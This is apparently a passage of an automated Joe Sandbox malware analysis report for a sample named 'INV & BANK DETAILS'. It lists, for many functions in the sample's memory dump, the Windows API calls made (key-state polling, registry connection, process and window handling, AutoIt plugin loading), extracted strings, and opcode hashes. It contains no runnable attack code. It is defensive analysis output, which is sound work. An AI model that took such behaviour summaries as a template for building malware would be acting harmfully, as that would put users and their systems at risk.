                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Virtual
                                • String ID:
                                • API String ID: 4278518827-0
                                • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                APIs
                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                • ExitThread.KERNEL32 ref: 004151ED
                                • __freefls@4.LIBCMT ref: 00415209
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                • String ID:
                                • API String ID: 442100245-0
                                • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                APIs
                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                • _wcslen.LIBCMT ref: 0045F94A
                                • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                • String ID: 0
                                • API String ID: 621800784-4108050209
                                • Opcode ID: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                • Opcode Fuzzy Hash: 81ac811d22c35f9fa91ba742b1be7df183685e8d6235a52bfd7a192db436f1c3
                                • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • SetErrorMode.KERNEL32 ref: 004781CE
                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                • SetErrorMode.KERNEL32(?), ref: 00478270
                                • SetErrorMode.KERNEL32(?), ref: 00478340
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                • String ID: \VH
                                • API String ID: 3884216118-234962358
                                • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: AU3_GetPluginDetails$Wu
                                • API String ID: 145871493-136108093
                                • Opcode ID: a0c48202d14957e5928cec6e7014de58bc38a72be84d6b9eb176fbc35b7d0d88
                                • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                • Opcode Fuzzy Hash: a0c48202d14957e5928cec6e7014de58bc38a72be84d6b9eb176fbc35b7d0d88
                                • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                APIs
                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                • IsMenu.USER32(?), ref: 0044854D
                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                • DrawMenuBar.USER32 ref: 004485AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Menu$Item$DrawInfoInsert
                                • String ID: 0
                                • API String ID: 3076010158-4108050209
                                • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$_memmove_wcslen
                                • String ID: ComboBox$ListBox
                                • API String ID: 1589278365-1403004172
                                • Opcode ID: 5e1087f5231825e2fb604e9bf8bfba74490696239ffb2df424a283dc5993ef7b
                                • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                • Opcode Fuzzy Hash: 5e1087f5231825e2fb604e9bf8bfba74490696239ffb2df424a283dc5993ef7b
                                • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Handle
                                • String ID: nul
                                • API String ID: 2519475695-2873401336
                                • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                APIs
                                • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Handle
                                • String ID: nul
                                • API String ID: 2519475695-2873401336
                                • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                APIs
                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • _wcsncpy.LIBCMT ref: 00401C41
                                • _wcscpy.LIBCMT ref: 00401C5D
                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                • String ID: Line:
                                • API String ID: 1874344091-1585850449
                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID: SysAnimate32
                                • API String ID: 0-1011021900
                                • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                APIs
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                  • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                • GetFocus.USER32 ref: 0046157B
                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                  • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                • __swprintf.LIBCMT ref: 00461608
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                • String ID: %s%d
                                • API String ID: 2645982514-1110647743
                                • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                APIs
                                • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Process$CloseCountersCurrentHandleOpen
                                • String ID:
                                • API String ID: 3488606520-0
                                • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ConnectRegistry_memmove_wcslen
                                • String ID:
                                • API String ID: 15295421-0
                                • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                APIs
                                • GetCursorPos.USER32(?), ref: 004563A6
                                • ScreenToClient.USER32(?,?), ref: 004563C3
                                • GetAsyncKeyState.USER32(?), ref: 00456400
                                • GetAsyncKeyState.USER32(?), ref: 00456410
                                • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: AsyncState$ClientCursorLongScreenWindow
                                • String ID:
                                • API String ID: 3539004672-0
